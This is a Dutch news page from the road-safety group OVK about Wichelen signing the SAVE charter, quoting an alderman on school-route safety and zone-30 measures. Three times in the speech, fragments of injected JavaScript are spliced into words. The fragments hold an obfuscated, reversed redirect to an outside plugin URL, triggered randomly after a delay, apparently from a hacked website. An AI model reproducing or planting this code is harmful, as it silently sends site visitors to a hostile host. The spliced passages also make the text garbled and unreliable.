Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Ondertekening SAVE-charter te Wichelen

Op vrijdag 8 november heeft de gemeente Wichelen als derde en laatste binnen dezelfde politiezone het SAVE-charter ondertekend.
De ondertekening vond plaats in de gemeenteschool ‘De Rozelaar’ te Serskamp. De kinderen van het eerste leerjaar kregen er op het ogenblik van de persuitreiking een fluohesje uitgedeeld en de kinderen van het vijfde leerjaar een fluo-rugzakovertrek.
Schepen van Mobiliteit Danny Praet lichtte tijdens zijn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toespraak de motieven om het charter te tekenen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe. ‘Los van het feit dat we niet konden achterblijven bij Laarne en Wichelen, is verkeersveiligheid, en dan zeker voor kinderen, van primordiaal belang’, zegt hij. ‘Bij wegenwerken gaat onze aandacht altijd in eerste instantie naar de zwakke weggebruiker. En dat is nodig. Het aantal ongevallen in onze gemeente stabiliseert de laatste jaren. Het aantal feiten met fietsers gaat echter in stijgende lijn.’
‘Vaak zijn de slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers ook kinderen. En dikwijls gebeuren de ongevallen op weg naar school. Twee van onze scholen liggen aan een drukke gewestweg. We namen daar al initiatieven door alternatieve wegen te voorzien en zones 30 in te voeren. Het gros van onze scholen ligt echter aan gemeentewegen en ook daar voerden we reeds zones 30 in en pasten we de infrastructuur aan. Toch blijft voortdurende sensibilisering een must. Daarvoor gaan we een actieplan opstellen. Het eerste jaar worden we daarbij ondersteund door de Ouders van Verongelukte Kinderen vzw. Hun expertise zal ons van pas komen. Zo snel mogelijk een SAVE-label zoals in Wetteren behalen, is het doel. We gaan daarvoor ook samenwerken met de politie.’
Toen de schoolbel het einde van de dag aankondigde werd al snel duidelijk dat de fluo-actie een groot succes was. De kinderen hadden stuk voor stuk hun fluohesje of rugzakovertrek aan om veilig naar huis te vertrekken.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be